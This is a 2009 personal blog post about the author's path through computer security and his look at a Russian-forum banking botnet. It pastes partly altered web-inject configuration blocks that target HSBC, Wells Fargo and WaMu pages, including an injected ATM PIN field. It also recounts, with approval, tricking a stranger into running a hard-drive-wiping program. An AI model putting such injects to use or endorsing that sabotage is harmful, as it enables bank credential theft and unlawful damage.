April 30, 2009

The Underground of the Cyber Age, PT I

Since i got my first PC back in 1999, i tore the thing apart to see how it works. I played with this and that, i was curious. In the true sense of the word, i was a hacker. Even long before i knew what a PC was, when it came to anything mechanical or electronic. I wanted to see how it worked, to see if i could make it work better and even make it do things it wasn't meant to do.

This whole new Cyber World was interesting. I could talk to people from long distances without running up a phone bill. I could put my art out there for everyone to see and i i could run into more assholes then i wanted to. But when the time came and i lost my bank card to someone on the net, i learned of a whole new genre or sub-sect of this Cyber World.

Call them hackers, phreakers or script kiddies, these groups of people have a whole other way of living in their off time and some full time. So back in the year 2000, i started to teach myself computer security. I didn't want this to happen again. So i read everything i could. Learned what a virus was, how worms worked, what a trojan was. Even taught myself how to code some of these things. I created a few small simple virus that did nothing but replicate a text file up to 1,000 times before it deleted itself. But i never released it to the public or in the "wild".

I even used the popular trojans of the day like Sub7, Back Orrifice and Hack a 'Tack. And out of the countless systems that were ever compromised, i learnt how to subvert firewalls and security software. And out of all those systems, only once and once ever did i damage a system. Some guy in Italy looking at child porn. I played with him a few minutes then i uploaded a program called Hard Drive Killer and set it to look like his security software. Gave him an error message that his software errored and he needed to update it. He ran my software and boom, no more hard drive.

Shortly after that, i got bored with all of that. I got good at removing the infections that the others were releasing. It even landed me some jobs and cash helping protect PC's. And i have stuck with that path for a long time now. And in my current job, i am doing just that plus a lot of other PC related business. But in the last 6-8 months, i have been looking into a career change. That along the lines of computer forensics. So i started looking into it as i went about my daily business. And during this time, including today, i have dealt with all of the new virus, infections, malware, etc. And i have seen how much more sophisticated it has become and how much harder it is for the security vendors to keep up with it. A perfect example is with the new Conficker worm. For the longest time, no one knew what was going to happen went it went off.

Anyways, i read on a daily basis of all the lawsuits for copyright this, trademark this, RIAA, MPAA, etc. And then i read my security blogs and other news. And the amount of people i talk to on a daily basis that really have no clue on what the PC really is other then a toy to get music and watch movies. How much we have become dependent on a piece of machinery to run our lives. And yet i just found out, no matter how much i have read, i'm the one that really doesn't understand. Just the other night, i got that wake up call.

I was Googling for something, which i have forgotten what it was, i came across a link. Opening the link to the site, i discovered a tool that i had heard about only month before all over the different sites i read. A new virus maker. Cool i thought, a new toy i can play with and look at. So i downloaded it, loaded up my virtual pc and had a look. Nothing special. it could create a small virus that does a lot from blocking certain aspects of the PC to formatting the hard drive. I've seen these programs in the past. So as i was ready to call it a night, i opened the Read Me file that was with it. In the file, it included the site of the maker. So i opened it. Total foreign language. But there was something in English so i had a look. One thing led to another and i found other sites, and more sites and more sites.

I Googled a few of these sites and nothing came in return. I tried a few more and got a few lucky results. But the ones that really have the goods, weren't coming up in any search. So i bookmarked them for later viewing and went to bed. Just the other night, i started looking through these sites on my virtual PC. I came across one i had booked marked and started reading through the forums. Some of it in English, some of it in Russian. next thing i knew, after downloading and looking at some things, and done reading for the night, it was 5am.

Last night however, really opened my eyes. It made me realize that what i thought was the underground of the Cyber World is more a facade of kids and automated programs. On one of these sites, there was talks from a hacker about a new botnet he was working on. For those of you who don't know what a botnet is, read this.

So i'm reading through this post. The hacker is from Russia. Along with a few of his counterparts on this site. He goes on to talk about what this new botnet is. He even put a beta version of it out for other people to take a look at. This post and some of the others i have read, is where it all kind of comes together.

Basically, the hacker creates the worms, virus's or botnet's and then sells them to the highest bidder. The things these people create are not your everyday mill of the run things you might see. But the complicated and sophisticated stuff that can really do a number. This hacker said that once it's done, he will have a public release for anyone to use, then a private release which is for sale that has more controls in it as well as support for it. His asking price, currently around $3,000. That's a hell of a lot of money for a piece of programing, but then so is the price of some of the software i have bought over the years.

Apparently that's how this underground works. And the price varies depending on the product. So i continued reading and even downloaded his trial version. Now, i'm a mediocre web designer. I can code in HTML, XHTML, CSS and some PHP. But what i saw was speechless. What i had in my hand, was the newest, undetectable banking botnet. Meaning, it was designed to steal any and all banking, Ebay, Paypal information from ones PC once it was infected. This is accomplished by whats called a drive by download. Same thing as a drive by shooting, only instead of a human life, it's your financial life.

So i started going through the code. Some of it i understood. Most of it, was a little over my head, but i'm sure i can figure it all out. But even then, it wasn't the code that got me. It was what was in the included files that struck a nerve. So what was it? I'll paste only a few parts of it, with modified code show it shows up.



set_url https://www.us.hsbc.com/* GL
data_before
< cellspacing="0" summary="page layout">
data_end
data_inject
data_end
data_after
< /table>
data_end


set_url https://online.wellsfargo.com/login* GP
data_before
< input type="password" name="password"*
data_end
data_inject
< width="225">< for="password" class="formlabel">3. ATM PIN< /label><>
< type="password" name="USpass" id="atmpin" size="20" maxlength="14" title="Enter ATM PIN" tabindex="11" accesskey="A">
<> < /td>
data_end
data_after
data_end
data_before
< for="account" class="formlabel">
data_end
data_inject
4. Sign on to
data_end
data_after
< /label>
data_end


set_url https://online.wamu.com/Servicing/Servicing.aspx?targetPage=AccountSummary GL
data_before
_accountSummaryContainer"*< /tr>
data_end
data_inject
data_end
data_after
< /table>
data_end




And the list went on and on and on. Then after the listing of the financial business, was all of the extra injection code. All of this is designed to get your username and passwords to your banks, PayPal, etc and email it in a text file back to whom ever controls it. And on the other side, is someone looking to make a few extra (thousands) dollars. All for buying a program someone created. So what does this mean to you and I? When your browsing the internet, be careful. Any site on the net can be infected with one of these drive by downloads.

The fact that someone has taken this "toy" that we use on a daily basis and use it in away that makes the mob of the days gone by look like children is in fact scary. Most people only hear about it on the news or in the paper. Very few understand it, much more could care less. but when you have an understanding of a few aspects of what's happening, and to finally see this in full black and white, it gives you a whole new outlook on the entire Cyber World thing.

Will this ever stop? 90% no. Only because these people have the knowledge and the know how to craft their skills to stay ahead of the norm. Though a few get picked off here and there, the underground is so large, we would have to cull the planet of PC's and the govt's of the world would have to outlaw them. And even then, i don't think it would be 100% gone.
Share:

Categories

Adrenaline (1) Art (17) Bucket List (1) Buffy (6) Cars (1) Charles Boyer (1) Christmas (1) Classics (2) Collections (4) Computers (16) confusion (3) corporate greed (7) Design (8) Dreams (10) fantasy (4) Feelings (1) Forza 6 (1) Frustration (4) Fun (3) funny (11) games (1) Gaming (3) General (91) Google+ (3) greed (3) Halloween (1) health (12) Hedy Lamarr (2) Hollywood Classics (1) horror (5) Ignorance (7) imagination (3) Journalism (1) Life (77) macabre (4) Military (1) Minecraft (3) Monster Trucks (1) Movie (3) Music (9) Ouch (2) Photos (1) Politics (24) Rant's (110) Religion (3) Romance (2) Sad (13) School (3) Silver Screen (1) Speed TV (1) Sports (6) Stupidity (2) Tech (18) TV (4) unemployment (2) Weird (2) World (5) Writings (11) WTH (5)

Google+ Followers

Copyright © Alt+F4 | Powered by Blogger